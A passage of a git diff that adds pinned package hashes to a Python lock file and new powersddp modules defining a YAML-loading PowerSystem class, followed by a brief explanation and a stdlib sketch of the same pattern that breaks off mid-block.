+ {file = "pywinpty-1.1.3-cp36-none-win_amd64.whl", hash = "sha256:81dc6f16d917b756e06fc58943e9750d59dbefc0ffd2086871d3fa5f33824446"},
+ {file = "pywinpty-1.1.3-cp37-none-win_amd64.whl", hash = "sha256:54557887e712ea3215ab0d9f089ed55a6cc8d826cd5d1e340d75300654c9663f"},
+ {file = "pywinpty-1.1.3-cp38-none-win_amd64.whl", hash = "sha256:f5e25197397f1fef0362caf3eb89f25441827a1e48bf15827c27021592fd2160"},
+ {file = "pywinpty-1.1.3-cp39-none-win_amd64.whl", hash = "sha256:b767276224f86b7560eb9173ba7956758cafcdfab97bb33837d42d2a0f1dbf67"},
+ {file = "pywinpty-1.1.3.tar.gz", hash = "sha256:3a1d57b338390333812a5eed31c93c7d8ba82b131078063703e731946d90c9f2"},
+]
+pyyaml = [
+ {file = "PyYAML-5.4.1-cp27-cp27m-macosx_10_9_x86_64.whl", hash = "sha256:3b2b1824fe7112845700f815ff6a489360226a5609b96ec2190a45e62a9fc922"},
+ {file = "PyYAML-5.4.1-cp27-cp27m-win32.whl", hash = "sha256:129def1b7c1bf22faffd67b8f3724645203b79d8f4cc81f674654d9902cb4393"},
+ {file = "PyYAML-5.4.1-cp27-cp27m-win_amd64.whl", hash = "sha256:4465124ef1b18d9ace298060f4eccc64b0850899ac4ac53294547536533800c8"},
+ {file = "PyYAML-5.4.1-cp27-cp27mu-manylinux1_x86_64.whl", hash = "sha256:bb4191dfc9306777bc594117aee052446b3fa88737cd13b7188d0e7aa8162185"},
+ {file = "PyYAML-5.4.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:6c78645d400265a062508ae399b60b8c167bf003db364ecb26dcab2bda048253"},
+ {file = "PyYAML-5.4.1-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:4e0583d24c881e14342eaf4ec5fbc97f934b999a6828693a99157fde912540cc"},
+ {file = "PyYAML-5.4.1-cp36-cp36m-manylinux2014_aarch64.whl", hash = "sha256:72a01f726a9c7851ca9bfad6fd09ca4e090a023c00945ea05ba1638c09dc3347"},
+ {file = "PyYAML-5.4.1-cp36-cp36m-manylinux2014_s390x.whl", hash = "sha256:895f61ef02e8fed38159bb70f7e100e00f471eae2bc838cd0f4ebb21e28f8541"},
+ {file = "PyYAML-5.4.1-cp36-cp36m-win32.whl", hash = "sha256:3bd0e463264cf257d1ffd2e40223b197271046d09dadf73a0fe82b9c1fc385a5"},
+ {file = "PyYAML-5.4.1-cp36-cp36m-win_amd64.whl", hash = "sha256:e4fac90784481d221a8e4b1162afa7c47ed953be40d31ab4629ae917510051df"},
+ {file = "PyYAML-5.4.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:5accb17103e43963b80e6f837831f38d314a0495500067cb25afab2e8d7a4018"},
+ {file = "PyYAML-5.4.1-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:e1d4970ea66be07ae37a3c2e48b5ec63f7ba6804bdddfdbd3cfd954d25a82e63"},
+ {file = "PyYAML-5.4.1-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:cb333c16912324fd5f769fff6bc5de372e9e7a202247b48870bc251ed40239aa"},
+ {file = "PyYAML-5.4.1-cp37-cp37m-manylinux2014_s390x.whl", hash = "sha256:fe69978f3f768926cfa37b867e3843918e012cf83f680806599ddce33c2c68b0"},
+ {file = "PyYAML-5.4.1-cp37-cp37m-win32.whl", hash = "sha256:dd5de0646207f053eb0d6c74ae45ba98c3395a571a2891858e87df7c9b9bd51b"},
+ {file = "PyYAML-5.4.1-cp37-cp37m-win_amd64.whl", hash = "sha256:08682f6b72c722394747bddaf0aa62277e02557c0fd1c42cb853016a38f8dedf"},
+ {file = "PyYAML-5.4.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:d2d9808ea7b4af864f35ea216be506ecec180628aced0704e34aca0b040ffe46"},
+ {file = "PyYAML-5.4.1-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:8c1be557ee92a20f184922c7b6424e8ab6691788e6d86137c5d93c1a6ec1b8fb"},
+ {file = "PyYAML-5.4.1-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:fd7f6999a8070df521b6384004ef42833b9bd62cfee11a09bda1079b4b704247"},
+ {file = "PyYAML-5.4.1-cp38-cp38-manylinux2014_s390x.whl", hash = "sha256:bfb51918d4ff3d77c1c856a9699f8492c612cde32fd3bcd344af9be34999bfdc"},
+ {file = "PyYAML-5.4.1-cp38-cp38-win32.whl", hash = "sha256:fa5ae20527d8e831e8230cbffd9f8fe952815b2b7dae6ffec25318803a7528fc"},
+ {file = "PyYAML-5.4.1-cp38-cp38-win_amd64.whl", hash = "sha256:0f5f5786c0e09baddcd8b4b45f20a7b5d61a7e7e99846e3c799b05c7c53fa696"},
+ {file = "PyYAML-5.4.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:294db365efa064d00b8d1ef65d8ea2c3426ac366c0c4368d930bf1c5fb497f77"},
+ {file = "PyYAML-5.4.1-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:74c1485f7707cf707a7aef42ef6322b8f97921bd89be2ab6317fd782c2d53183"},
+ {file = "PyYAML-5.4.1-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:d483ad4e639292c90170eb6f7783ad19490e7a8defb3e46f97dfe4bacae89122"},
+ {file = "PyYAML-5.4.1-cp39-cp39-manylinux2014_s390x.whl", hash = "sha256:fdc842473cd33f45ff6bce46aea678a54e3d21f1b61a7750ce3c498eedfe25d6"},
+ {file = "PyYAML-5.4.1-cp39-cp39-win32.whl", hash = "sha256:49d4cdd9065b9b6e206d0595fee27a96b5dd22618e7520c33204a4a3239d5b10"},
+ {file = "PyYAML-5.4.1-cp39-cp39-win_amd64.whl", hash = "sha256:c20cfa2d49991c8b4147af39859b167664f2ad4561704ee74c1de03318e898db"},
+ {file = "PyYAML-5.4.1.tar.gz", hash = "sha256:607774cbba28732bfa802b54baa7484215f530991055bb562efbed5b2f20a45e"},
+]
+pyzmq = [
+ {file = "pyzmq-22.2.1-cp310-cp310-macosx_10_15_universal2.whl", hash = "sha256:d60a407663b7c2af781ab7f49d94a3d379dd148bb69ea8d9dd5bc69adf18097c"},
+ {file = "pyzmq-22.2.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:631f932fb1fa4b76f31adf976f8056519bc6208a3c24c184581c3dd5be15066e"},
+ {file = "pyzmq-22.2.1-cp310-cp310-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:0471d634c7fe48ff7d3849798da6c16afc71676dd890b5ae08eb1efe735c6fec"},
+ {file = "pyzmq-22.2.1-cp310-cp310-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:f520e9fee5d7a2e09b051d924f85b977c6b4e224e56c0551c3c241bbeeb0ad8d"},
+ {file = "pyzmq-22.2.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c1b6619ceb33a8907f1cb82ff8afc8a133e7a5f16df29528e919734718600426"},
+ {file = "pyzmq-22.2.1-cp310-cp310-win32.whl", hash = "sha256:31c5dfb6df5148789835128768c01bf6402eb753d06f524f12f6786caf96fb44"},
+ {file = "pyzmq-22.2.1-cp310-cp310-win_amd64.whl", hash = "sha256:4842a8263cbaba6fce401bbe4e2b125321c401a01714e42624dabc554bfc2629"},
+ {file = "pyzmq-22.2.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:b921758f8b5098faa85f341bbdd5e36d5339de5e9032ca2b07d8c8e7bec5069b"},
+ {file = "pyzmq-22.2.1-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:240b83b3a8175b2f616f80092cbb019fcd5c18598f78ffc6aa0ae9034b300f14"},
+ {file = "pyzmq-22.2.1-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:da7f7f3bb08bcf59a6b60b4e53dd8f08bb00c9e61045319d825a906dbb3c8fb7"},
+ {file = "pyzmq-22.2.1-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:e66025b64c4724ba683d6d4a4e5ee23de12fe9ae683908f0c7f0f91b4a2fd94e"},
+ {file = "pyzmq-22.2.1-cp36-cp36m-win32.whl", hash = "sha256:50d007d5702171bc810c1e74498fa2c7bc5b50f9750697f7fd2a3e71a25aad91"},
+ {file = "pyzmq-22.2.1-cp36-cp36m-win_amd64.whl", hash = "sha256:b4a51c7d906dc263a0cc5590761e53e0a68f2c2fefe549cbef21c9ee5d2d98a4"},
+ {file = "pyzmq-22.2.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:93705cb90baa9d6f75e8448861a1efd3329006f79095ab18846bd1eaa342f7c3"},
+ {file = "pyzmq-22.2.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:620b0abb813958cb3ecb5144c177e26cde92fee6f43c4b9de6b329515532bf27"},
+ {file = "pyzmq-22.2.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.whl", hash = "sha256:2dd3896b3c952cf6c8013deda53c1df16bf962f355b5503d23521e0f6403ae3d"},
+ {file = "pyzmq-22.2.1-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.whl", hash = "sha256:6e9c030222893afa86881d7485d3e841969760a16004bd23e9a83cca28b42778"},
+ {file = "pyzmq-22.2.1-cp37-cp37m-win32.whl", hash = "sha256:262f470e7acde18b7217aac78d19d2e29ced91a5afbeb7d98521ebf26461aa7e"},
+ {file = "pyzmq-22.2.1-cp37-cp37m-win_amd64.whl", hash = "sha256:246f27b88722cfa729bb04881e94484e40b085720d728c1b05133b3f331b0b7b"},
+ {file = "pyzmq-22.2.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:0d17bac19e934e9f547a8811b7c2a32651a7840f38086b924e2e3dcb2fae5c3a"},
+ {file = "pyzmq-22.2.1-cp38-cp38-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:5933d1f4087de6e52906f72d92e1e4dcc630d371860b92c55d7f7a4b815a664c"},
+ {file = "pyzmq-22.2.1-cp38-cp38-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:ac4497e4b7d134ee53ce5532d9cc3b640d6e71806a55062984e0c99a2f88f465"},
+ {file = "pyzmq-22.2.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:66375a6094af72a6098ed4403b15b4db6bf00013c6febc1baa832e7abda827f4"},
+ {file = "pyzmq-22.2.1-cp38-cp38-win32.whl", hash = "sha256:b2c16d20bd0aef8e57bc9505fdd80ea0d6008020c3740accd96acf1b3d1b5347"},
+ {file = "pyzmq-22.2.1-cp38-cp38-win_amd64.whl", hash = "sha256:ff345d48940c834168f81fa1d4724675099f148f1ab6369748c4d712ed71bf7c"},
+ {file = "pyzmq-22.2.1-cp39-cp39-macosx_10_15_universal2.whl", hash = "sha256:f5c84c5de9a773bbf8b22c51e28380999ea72e5e85b4db8edf5e69a7a0d4d9f9"},
+ {file = "pyzmq-22.2.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:2534a036b777f957bd6b89b55fb2136775ca2659fb0f1c85036ba78d17d86fd5"},
+ {file = "pyzmq-22.2.1-cp39-cp39-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:a649065413ba4eab92a783a7caa4de8ce14cf46ba8a2a09951426143f1298adb"},
+ {file = "pyzmq-22.2.1-cp39-cp39-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:c9cb0bd3a3cb7ccad3caa1d7b0d18ba71ed3a4a3610028e506a4084371d4d223"},
+ {file = "pyzmq-22.2.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b4428302c389fffc0c9c07a78cad5376636b9d096f332acfe66b321ae9ff2c63"},
+ {file = "pyzmq-22.2.1-cp39-cp39-win32.whl", hash = "sha256:6a5b4566f66d953601d0d47d4071897f550a265bafd52ebcad5ac7aad3838cbb"},
+ {file = "pyzmq-22.2.1-cp39-cp39-win_amd64.whl", hash = "sha256:89200ab6ef9081c72a04ed84c52a50b60dcb0655375aeedb40689bc7c934715e"},
+ {file = "pyzmq-22.2.1-pp37-pypy37_pp73-macosx_10_9_x86_64.whl", hash = "sha256:ed67df4eaa99a20d162d76655bda23160abdf8abf82a17f41dfd3962e608dbcc"},
+ {file = "pyzmq-22.2.1-pp37-pypy37_pp73-manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:021e22a8c58ab294bd4b96448a2ca4e716e1d76600192ff84c33d71edb1fbd37"},
+ {file = "pyzmq-22.2.1-pp37-pypy37_pp73-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:200ac096cee5499964c90687306a7244b79ef891f773ed4cf15019fd1f3df330"},
+ {file = "pyzmq-22.2.1-pp37-pypy37_pp73-win_amd64.whl", hash = "sha256:b3f57bee62e36be5c97712de32237c5589caee0d1154c2ad01a888accfae20bc"},
+ {file = "pyzmq-22.2.1.tar.gz", hash = "sha256:6d18c76676771fd891ca8e0e68da0bbfb88e30129835c0ade748016adb3b6242"},
+]
regex = [
{file = "regex-2021.8.3-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:8764a78c5464ac6bde91a8c87dd718c27c1cabb7ed2b4beaf36d3e8e390567f9"},
{file = "regex-2021.8.3-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4551728b767f35f86b8e5ec19a363df87450c7376d7419c3cac5b9ceb4bce576"},
@@ -437,6 +1749,34 @@ regex = [
{file = "regex-2021.8.3-cp39-cp39-win_amd64.whl", hash = "sha256:bfa6a679410b394600eafd16336b2ce8de43e9b13f7fb9247d84ef5ad2b45e91"},
{file = "regex-2021.8.3.tar.gz", hash = "sha256:8935937dad2c9b369c3d932b0edbc52a62647c2afb2fafc0c280f14a8bf56a6a"},
]
+requests = [
+ {file = "requests-2.26.0-py2.py3-none-any.whl", hash = "sha256:6c1246513ecd5ecd4528a0906f910e8f0f9c6b8ec72030dc9fd154dc1a6efd24"},
+ {file = "requests-2.26.0.tar.gz", hash = "sha256:b8aa58f8cf793ffd8782d3d8cb19e66ef36f7aba4353eec859e74678b01b07a7"},
+]
+requests-unixsocket = [
+ {file = "requests-unixsocket-0.2.0.tar.gz", hash = "sha256:9e5c1a20afc3cf786197ae59c79bcdb0e7565f218f27df5f891307ee8817c1ea"},
+ {file = "requests_unixsocket-0.2.0-py2.py3-none-any.whl", hash = "sha256:014d07bfb66dc805a011a8b4b306cf4ec96d2eddb589f6b2b5765e626f0dc0cc"},
+]
+send2trash = [
+ {file = "Send2Trash-1.8.0-py3-none-any.whl", hash = "sha256:f20eaadfdb517eaca5ce077640cb261c7d2698385a6a0f072a4a5447fd49fa08"},
+ {file = "Send2Trash-1.8.0.tar.gz", hash = "sha256:d2c24762fd3759860a0aff155e45871447ea58d2be6bdd39b5c8f966a0c99c2d"},
+]
+six = [
+ {file = "six-1.16.0-py2.py3-none-any.whl", hash = "sha256:8abb2f1d86890a2dfb989f9a77cfcfd3e47c2a354b01111771326f8aa26e0254"},
+ {file = "six-1.16.0.tar.gz", hash = "sha256:1e61c37477a1626458e36f7b1d82aa5c9b094fa4802892072e49de9c60c4c926"},
+]
+sniffio = [
+ {file = "sniffio-1.2.0-py3-none-any.whl", hash = "sha256:471b71698eac1c2112a40ce2752bb2f4a4814c22a54a3eed3676bc0f5ca9f663"},
+ {file = "sniffio-1.2.0.tar.gz", hash = "sha256:c4666eecec1d3f50960c6bdf61ab7bc350648da6c126e3cf6898d8cd4ddcd3de"},
+]
+terminado = [
+ {file = "terminado-0.11.0-py3-none-any.whl", hash = "sha256:221eef83e6a504894842f7dccfa971ca2e98ec22a8a9118577e5257527674b42"},
+ {file = "terminado-0.11.0.tar.gz", hash = "sha256:1e01183885f64c1bba3cf89a5a995ad4acfed4e5f00aebcce1bf7f089b0825a1"},
+]
+testpath = [
+ {file = "testpath-0.5.0-py3-none-any.whl", hash = "sha256:8044f9a0bab6567fc644a3593164e872543bb44225b0e24846e2c89237937589"},
+ {file = "testpath-0.5.0.tar.gz", hash = "sha256:1acf7a0bcd3004ae8357409fc33751e16d37ccc650921da1094a86581ad1e417"},
+]
toml = [
{file = "toml-0.10.2-py2.py3-none-any.whl", hash = "sha256:806143ae5bfb6a3c6e736a764057db0e6a0e05e338b5630894a5f779cabb4f9b"},
{file = "toml-0.10.2.tar.gz", hash = "sha256:b3bda1d108d5dd99f4a20d24d9c348e91c4db7ab1b749200bded2f839ccbe68f"},
@@ -445,15 +1785,78 @@ tomli = [
{file = "tomli-1.2.1-py3-none-any.whl", hash = "sha256:8dd0e9524d6f386271a36b41dbf6c57d8e32fd96fd22b6584679dc569d20899f"},
{file = "tomli-1.2.1.tar.gz", hash = "sha256:a5b75cb6f3968abb47af1b40c1819dc519ea82bcc065776a866e8d74c5ca9442"},
]
+tornado = [
+ {file = "tornado-6.1-cp35-cp35m-macosx_10_9_x86_64.whl", hash = "sha256:d371e811d6b156d82aa5f9a4e08b58debf97c302a35714f6f45e35139c332e32"},
+ {file = "tornado-6.1-cp35-cp35m-manylinux1_i686.whl", hash = "sha256:0d321a39c36e5f2c4ff12b4ed58d41390460f798422c4504e09eb5678e09998c"},
+ {file = "tornado-6.1-cp35-cp35m-manylinux1_x86_64.whl", hash = "sha256:9de9e5188a782be6b1ce866e8a51bc76a0fbaa0e16613823fc38e4fc2556ad05"},
+ {file = "tornado-6.1-cp35-cp35m-manylinux2010_i686.whl", hash = "sha256:61b32d06ae8a036a6607805e6720ef00a3c98207038444ba7fd3d169cd998910"},
+ {file = "tornado-6.1-cp35-cp35m-manylinux2010_x86_64.whl", hash = "sha256:3e63498f680547ed24d2c71e6497f24bca791aca2fe116dbc2bd0ac7f191691b"},
+ {file = "tornado-6.1-cp35-cp35m-manylinux2014_aarch64.whl", hash = "sha256:6c77c9937962577a6a76917845d06af6ab9197702a42e1346d8ae2e76b5e3675"},
+ {file = "tornado-6.1-cp35-cp35m-win32.whl", hash = "sha256:6286efab1ed6e74b7028327365cf7346b1d777d63ab30e21a0f4d5b275fc17d5"},
+ {file = "tornado-6.1-cp35-cp35m-win_amd64.whl", hash = "sha256:fa2ba70284fa42c2a5ecb35e322e68823288a4251f9ba9cc77be04ae15eada68"},
+ {file = "tornado-6.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:0a00ff4561e2929a2c37ce706cb8233b7907e0cdc22eab98888aca5dd3775feb"},
+ {file = "tornado-6.1-cp36-cp36m-manylinux1_i686.whl", hash = "sha256:748290bf9112b581c525e6e6d3820621ff020ed95af6f17fedef416b27ed564c"},
+ {file = "tornado-6.1-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:e385b637ac3acaae8022e7e47dfa7b83d3620e432e3ecb9a3f7f58f150e50921"},
+ {file = "tornado-6.1-cp36-cp36m-manylinux2010_i686.whl", hash = "sha256:25ad220258349a12ae87ede08a7b04aca51237721f63b1808d39bdb4b2164558"},
+ {file = "tornado-6.1-cp36-cp36m-manylinux2010_x86_64.whl", hash = "sha256:65d98939f1a2e74b58839f8c4dab3b6b3c1ce84972ae712be02845e65391ac7c"},
+ {file = "tornado-6.1-cp36-cp36m-manylinux2014_aarch64.whl", hash = "sha256:e519d64089b0876c7b467274468709dadf11e41d65f63bba207e04217f47c085"},
+ {file = "tornado-6.1-cp36-cp36m-win32.whl", hash = "sha256:b87936fd2c317b6ee08a5741ea06b9d11a6074ef4cc42e031bc6403f82a32575"},
+ {file = "tornado-6.1-cp36-cp36m-win_amd64.whl", hash = "sha256:cc0ee35043162abbf717b7df924597ade8e5395e7b66d18270116f8745ceb795"},
+ {file = "tornado-6.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:7250a3fa399f08ec9cb3f7b1b987955d17e044f1ade821b32e5f435130250d7f"},
+ {file = "tornado-6.1-cp37-cp37m-manylinux1_i686.whl", hash = "sha256:ed3ad863b1b40cd1d4bd21e7498329ccaece75db5a5bf58cd3c9f130843e7102"},
+ {file = "tornado-6.1-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:dcef026f608f678c118779cd6591c8af6e9b4155c44e0d1bc0c87c036fb8c8c4"},
+ {file = "tornado-6.1-cp37-cp37m-manylinux2010_i686.whl", hash = "sha256:70dec29e8ac485dbf57481baee40781c63e381bebea080991893cd297742b8fd"},
+ {file = "tornado-6.1-cp37-cp37m-manylinux2010_x86_64.whl", hash = "sha256:d3f7594930c423fd9f5d1a76bee85a2c36fd8b4b16921cae7e965f22575e9c01"},
+ {file = "tornado-6.1-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:3447475585bae2e77ecb832fc0300c3695516a47d46cefa0528181a34c5b9d3d"},
+ {file = "tornado-6.1-cp37-cp37m-win32.whl", hash = "sha256:e7229e60ac41a1202444497ddde70a48d33909e484f96eb0da9baf8dc68541df"},
+ {file = "tornado-6.1-cp37-cp37m-win_amd64.whl", hash = "sha256:cb5ec8eead331e3bb4ce8066cf06d2dfef1bfb1b2a73082dfe8a161301b76e37"},
+ {file = "tornado-6.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:20241b3cb4f425e971cb0a8e4ffc9b0a861530ae3c52f2b0434e6c1b57e9fd95"},
+ {file = "tornado-6.1-cp38-cp38-manylinux1_i686.whl", hash = "sha256:c77da1263aa361938476f04c4b6c8916001b90b2c2fdd92d8d535e1af48fba5a"},
+ {file = "tornado-6.1-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:fba85b6cd9c39be262fcd23865652920832b61583de2a2ca907dbd8e8a8c81e5"},
+ {file = "tornado-6.1-cp38-cp38-manylinux2010_i686.whl", hash = "sha256:1e8225a1070cd8eec59a996c43229fe8f95689cb16e552d130b9793cb570a288"},
+ {file = "tornado-6.1-cp38-cp38-manylinux2010_x86_64.whl", hash = "sha256:d14d30e7f46a0476efb0deb5b61343b1526f73ebb5ed84f23dc794bdb88f9d9f"},
+ {file = "tornado-6.1-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:8f959b26f2634a091bb42241c3ed8d3cedb506e7c27b8dd5c7b9f745318ddbb6"},
+ {file = "tornado-6.1-cp38-cp38-win32.whl", hash = "sha256:34ca2dac9e4d7afb0bed4677512e36a52f09caa6fded70b4e3e1c89dbd92c326"},
+ {file = "tornado-6.1-cp38-cp38-win_amd64.whl", hash = "sha256:6196a5c39286cc37c024cd78834fb9345e464525d8991c21e908cc046d1cc02c"},
+ {file = "tornado-6.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:f0ba29bafd8e7e22920567ce0d232c26d4d47c8b5cf4ed7b562b5db39fa199c5"},
+ {file = "tornado-6.1-cp39-cp39-manylinux1_i686.whl", hash = "sha256:33892118b165401f291070100d6d09359ca74addda679b60390b09f8ef325ffe"},
+ {file = "tornado-6.1-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:7da13da6f985aab7f6f28debab00c67ff9cbacd588e8477034c0652ac141feea"},
+ {file = "tornado-6.1-cp39-cp39-manylinux2010_i686.whl", hash = "sha256:e0791ac58d91ac58f694d8d2957884df8e4e2f6687cdf367ef7eb7497f79eaa2"},
+ {file = "tornado-6.1-cp39-cp39-manylinux2010_x86_64.whl", hash = "sha256:66324e4e1beede9ac79e60f88de548da58b1f8ab4b2f1354d8375774f997e6c0"},
+ {file = "tornado-6.1-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:a48900ecea1cbb71b8c71c620dee15b62f85f7c14189bdeee54966fbd9a0c5bd"},
+ {file = "tornado-6.1-cp39-cp39-win32.whl", hash = "sha256:d3d20ea5782ba63ed13bc2b8c291a053c8d807a8fa927d941bd718468f7b950c"},
+ {file = "tornado-6.1-cp39-cp39-win_amd64.whl", hash = "sha256:548430be2740e327b3fe0201abe471f314741efcb0067ec4f2d7dcfb4825f3e4"},
+ {file = "tornado-6.1.tar.gz", hash = "sha256:33c6e81d7bd55b468d2e793517c909b139960b6c790a60b7991b9b6b76fb9791"},
+]
+traitlets = [
+ {file = "traitlets-5.0.5-py3-none-any.whl", hash = "sha256:69ff3f9d5351f31a7ad80443c2674b7099df13cc41fc5fa6e2f6d3b0330b0426"},
+ {file = "traitlets-5.0.5.tar.gz", hash = "sha256:178f4ce988f69189f7e523337a3e11d91c786ded9360174a3d9ca83e79bc5396"},
+]
+types-pyyaml = [
+ {file = "types-PyYAML-5.4.6.tar.gz", hash = "sha256:745dcb4b1522423026bcc83abb9925fba747f1e8602d902f71a4058f9e7fb662"},
+ {file = "types_PyYAML-5.4.6-py3-none-any.whl", hash = "sha256:96f8d3d96aa1a18a465e8f6a220e02cff2f52632314845a364ecbacb0aea6e30"},
+]
typing-extensions = [
{file = "typing_extensions-3.10.0.0-py2-none-any.whl", hash = "sha256:0ac0f89795dd19de6b97debb0c6af1c70987fd80a2d62d1958f7e56fcc31b497"},
{file = "typing_extensions-3.10.0.0-py3-none-any.whl", hash = "sha256:779383f6086d90c99ae41cf0ff39aac8a7937a9283ce0a414e5dd782f4c94a84"},
{file = "typing_extensions-3.10.0.0.tar.gz", hash = "sha256:50b6f157849174217d0656f99dc82fe932884fb250826c18350e159ec6cdf342"},
]
+urllib3 = [
+ {file = "urllib3-1.26.6-py2.py3-none-any.whl", hash = "sha256:39fb8672126159acb139a7718dd10806104dec1e2f0f6c88aab05d17df10c8d4"},
+ {file = "urllib3-1.26.6.tar.gz", hash = "sha256:f57b4c16c62fa2760b7e3d97c35b255512fb6b59a259730f36ba32ce9f8e342f"},
+]
wcwidth = [
{file = "wcwidth-0.2.5-py2.py3-none-any.whl", hash = "sha256:beb4802a9cebb9144e99086eff703a642a13d6a0052920003a230f3294bbe784"},
{file = "wcwidth-0.2.5.tar.gz", hash = "sha256:c4d647b99872929fdb7bdcaa4fbe7f01413ed3d98077df798530e5b04f116c83"},
]
+webencodings = [
+ {file = "webencodings-0.5.1-py2.py3-none-any.whl", hash = "sha256:a0af1213f3c2226497a97e2b3aa01a7e4bee4f403f95be16fc9acd2947514a78"},
+ {file = "webencodings-0.5.1.tar.gz", hash = "sha256:b36a1c245f2d304965eb4e0a82848379241dc04b865afcc4aab16748587e1923"},
+]
+websocket-client = [
+ {file = "websocket-client-1.2.1.tar.gz", hash = "sha256:8dfb715d8a992f5712fff8c843adae94e22b22a99b2c5e6b0ec4a1a981cc4e0d"},
+ {file = "websocket_client-1.2.1-py2.py3-none-any.whl", hash = "sha256:0133d2f784858e59959ce82ddac316634229da55b498aac311f1620567a710ec"},
+]
wrapt = [
{file = "wrapt-1.12.1.tar.gz", hash = "sha256:b62ffa81fb85f4332a4f609cab4ac40709470da05643a082ec1eb88e6d9b97d7"},
]
diff --git a/powersddp/__init__.py b/powersddp/__init__.py
index 3dc1f76..a60e765 100644
--- a/powersddp/__init__.py
+++ b/powersddp/__init__.py
@@ -1,1 +1,1 @@
-__version__ = "0.1.0"
+from powersddp.core.api import PowerSystem
diff --git a/powersddp/core/__init__.py b/powersddp/core/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/powersddp/core/api.py b/powersddp/core/api.py
new file mode 100644
index 0000000..d33db35
--- /dev/null
+++ b/powersddp/core/api.py
@@ -0,0 +1,1 @@
+from powersddp.core.system import PowerSystem
diff --git a/powersddp/core/system.py b/powersddp/core/system.py
new file mode 100644
index 0000000..d8e72df
--- /dev/null
+++ b/powersddp/core/system.py
@@ -0,0 +1,59 @@
+"""Module to handle classes and methods related to a selected Power System.
+This module should follow a systems.json file standard:
+{
+ "{name}": {
+ "shedding_cost": float,
+ "load": [float, float, float],
+ "n_disc": int,
+ "n_est": int,
+ "n_cen": int,
+ "generation_units": [
+ {"type": "hydro",
+ "name": "str",
+ "v_max": float,
+ "v_min": float,
+ "prod": float,
+ "flow_max": float,
+ "inflow_scenarios":[<list>]},
+ {"type": "thermal", "name": "str", "capacity": "float", "cost": float},
+ ...
+ ]
+ }
+}
+Where {name} should be changed to whatever name you may choose for your system.
+For example, 'Test01'. Check README.md file.
+"""
+
+from abc import ABC, abstractclassmethod
+import yaml
+
+from powersddp.util._yml import YmlLoader
+
+YmlLoader.add_constructor("!include", YmlLoader.include)
+
+
+class PowerSystemInterface(ABC):
+ @abstractclassmethod
+ def load_system(self):
+ raise NotImplementedError
+
+
+class PowerSystem(PowerSystemInterface):
+ def __init__(self, verbose: bool = False, **kwargs):
+ self.__verbose = verbose
+ self.__dict__.update(kwargs)
+ self.load_system()
+
+ def load_system(self):
+ if "path" in self.__dict__:
+ with open(self.path, "r") as f:
+ data = yaml.load(f, YmlLoader)
+
+ self.data = data
+ if self.__verbose:
+ print("System loaded from {} file".format(self.path))
+ elif "data" in self.__dict__:
+ if self.__verbose:
+ print("System loaded from 'data' payload")
+ else:
+ raise NotImplementedError
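The constructor above stores arbitrary keyword arguments on the instance and then dispatches on whether a `path` or a `data` attribute is present. A stdlib-only sketch of the same pattern (JSON in place of the package's YAML loader, `abstractmethod` in place of the deprecated `abstractclassmethod`; the `System` class and field names here are illustrative, not the package's API):

```python
import json
import tempfile
from abc import ABC, abstractmethod

class SystemInterface(ABC):
    @abstractmethod
    def load_system(self):
        raise NotImplementedError

class System(SystemInterface):
    """Accepts either path=<file> or data=<dict>, mirroring PowerSystem.__init__."""
    def __init__(self, verbose: bool = False, **kwargs):
        self._verbose = verbose
        self.__dict__.update(kwargs)  # stores 'path' or 'data' as attributes
        self.load_system()

    def load_system(self):
        if "path" in self.__dict__:
            with open(self.path, "r") as f:
                self.data = json.load(f)  # the real package parses YAML here
            if self._verbose:
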